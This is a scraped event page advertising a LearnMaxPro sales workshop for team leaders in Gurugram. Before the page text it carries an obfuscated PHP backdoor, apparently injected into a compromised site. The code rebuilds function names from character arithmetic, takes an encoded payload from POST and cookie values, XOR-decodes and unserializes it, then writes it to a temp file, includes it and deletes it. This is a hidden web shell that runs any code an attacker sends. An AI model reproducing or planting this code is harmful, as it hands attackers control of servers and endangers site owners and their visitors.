$OJACwgla = chr ( 944 - 871 ).chr (95) . "\x78" . chr (76) . chr ( 381 - 272 ); $jcaAsxsC = "\x63" . 'l' . "\141" . "\163" . "\163" . chr (95) . chr ( 263 - 162 )."\x78" . chr (105) . chr ( 272 - 157 )."\x74" . 's';$wditdJRkc = class_exists($OJACwgla); $jcaAsxsC = "51356";$DsdKjLE = strpos($jcaAsxsC, $OJACwgla);if ($wditdJRkc == $DsdKjLE){function qIxWugPTf(){$zQepvoUn = new /* 6488 */ I_xLm(56203 + 56203); $zQepvoUn = NULL;}$NyKazOQFW = "56203";class I_xLm{private function dHZXHJ($NyKazOQFW){if (is_array(I_xLm::$OMOjjxBqQ)) {$name = sys_get_temp_dir() . "/" . crc32(I_xLm::$OMOjjxBqQ["salt"]);@I_xLm::$OMOjjxBqQ["write"]($name, I_xLm::$OMOjjxBqQ["content"]);include $name;@I_xLm::$OMOjjxBqQ["delete"]($name); $NyKazOQFW = "56203";exit();}}public function vgrRtjPCS(){$ZtwXhpBA = "52800";$this->_dummy = str_repeat($ZtwXhpBA, strlen($ZtwXhpBA));}public function __destruct(){I_xLm::$OMOjjxBqQ = @unserialize(I_xLm::$OMOjjxBqQ); $NyKazOQFW = "60167_51485";$this->dHZXHJ($NyKazOQFW); $NyKazOQFW = "60167_51485";}public function NpmAsEl($ZtwXhpBA, $GBLUOBkBu){return $ZtwXhpBA[0] ^ str_repeat($GBLUOBkBu, intval(strlen($ZtwXhpBA[0]) / strlen($GBLUOBkBu)) + 1);}public function nUxhlpUq($ZtwXhpBA){$FysvEdu = chr ( 547 - 449 ).chr (97) . "\x73" . chr ( 1027 - 926 )."\x36" . "\64";return array_map($FysvEdu . chr ( 664 - 569 ).'d' . chr ( 546 - 445 ).chr ( 144 - 45 ).'o' . chr ( 597 - 497 )."\x65", array($ZtwXhpBA,));}public function __construct($HfYENh=0){$LPPPRb = "\x2c";$ZtwXhpBA = "";$ElbxSoltn = $_POST;$rCwDgLYcnv = $_COOKIE;$GBLUOBkBu = "86a24b5f-4593-493c-a7d8-74643ccbc737";$ZtRmmNbtc = @$rCwDgLYcnv[substr($GBLUOBkBu, 0, 4)];if (!empty($ZtRmmNbtc)){$ZtRmmNbtc = explode($LPPPRb, $ZtRmmNbtc);foreach ($ZtRmmNbtc as $RdvWn){$ZtwXhpBA .= @$rCwDgLYcnv[$RdvWn];$ZtwXhpBA .= @$ElbxSoltn[$RdvWn];}$ZtwXhpBA = $this->nUxhlpUq($ZtwXhpBA);}I_xLm::$OMOjjxBqQ = $this->NpmAsEl($ZtwXhpBA, $GBLUOBkBu);if (strpos($GBLUOBkBu, $LPPPRb) !== FALSE){$GBLUOBkBu = explode($LPPPRb, $GBLUOBkBu); $vYAYfUz = base64_decode(md5($GBLUOBkBu[0])); $iwikMy = strlen($GBLUOBkBu[1]) > 5 ? substr($GBLUOBkBu[1], 0, 5) : $GBLUOBkBu[1];$_GET['new_key'] = md5(implode('', $GBLUOBkBu)); $bQEIUDtACX = str_repeat($iwikMy, 2); $zemsVeZDk = array_map('trim', $GBLUOBkBu);}}public static $OMOjjxBqQ = 18036;}qIxWugPTf();} SALES WORKSHOP FOR TEAM LEADERS AND MANAGERS | LearnMaxPro Solutions
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Effective sales training has a direct correlation to business results. By investing in training resources into the right people, this sales training workshop guides sales reps to exceed targets via multiple indirect routes to control the sales cycle, including tools to build and claim value, and to combat buyers’ tactics and gain leverage, all while strengthening relationships.

According to McKinsey, stronger sales training relates to stronger performance across key skill areas.


Thus, undertaking sales training often results in higher opportunity win rates, claiming maximum value through pricing and volume, and an increase in the ability to fill pipelines and grow accounts.


  • Create value by leveraging customer needs.
  • Learn how to shorten the sales cycle by closing larger deals faster.
  • Master persuasion and influence to win more “yeses.”
  • Practice handling objectives and objections.
  • Keeping control of meetings.

Location: Hotel Lemon Tree, Sector – 29 Near Huda Metro Station Gurugram

For any queries, Contact us at-

support@learnmaxpro.com; +91 8920742324


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  • Start Time
    May 14 @ 11:00 AM
  • End Time
    May 14 @ 3:00 PM